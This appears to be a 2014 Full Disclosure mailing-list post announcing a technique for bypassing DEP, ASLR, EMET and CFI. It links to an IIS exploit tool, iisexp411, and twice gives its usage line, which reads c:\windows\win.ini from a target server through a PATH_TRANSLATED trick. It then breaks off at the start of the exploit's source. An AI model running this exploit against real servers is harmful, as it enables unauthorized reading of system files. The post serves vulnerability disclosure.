From: yuange1...@hotmail.com
To: fulldisclosure@seclists.org
Subject: dve bypass dep+aslr+emet+cfi
Date: Sat, 29 Mar 2014 15:31:06 +
DVE (data virtual execution) technique against DEP+ASLR+EMET+CFI
http://hi.baidu.com/yuange1975/item/863a25e4501f542c5a7cfb7b
Beware of a new type of virus that combines an interpreted language with CPU code http://t.cn/zYBJa07 (text virus)
Discovered in 2000 for IIS4\IIS5 0day.
.php -> php.exe
The exploit file, ver 4.1.1.
http://seclists.org/fulldisclosure/2012/Apr/13
usage:
iisexp411 127.0.0.1 /AprilFools'Day.php PATH_TRANSLATED c:\windows\win.ini
yuan can get the file c:\windows\win.ini
HTTP/1.1 200 OK
http://hi.baidu.com/yuange1975/item/b2cc7141c22108e91e19bc2e
The exp file, ver 4.1.1.
http://seclists.org/fulldisclosure/2012/Apr/13
usage:
iisexp411 127.0.0.1 /AprilFools'Day.php PATH_TRANSLATED c:\windows\win.ini
/* iisexp41.c ver4.1 copy by @yuange1975 2012.4.1
iise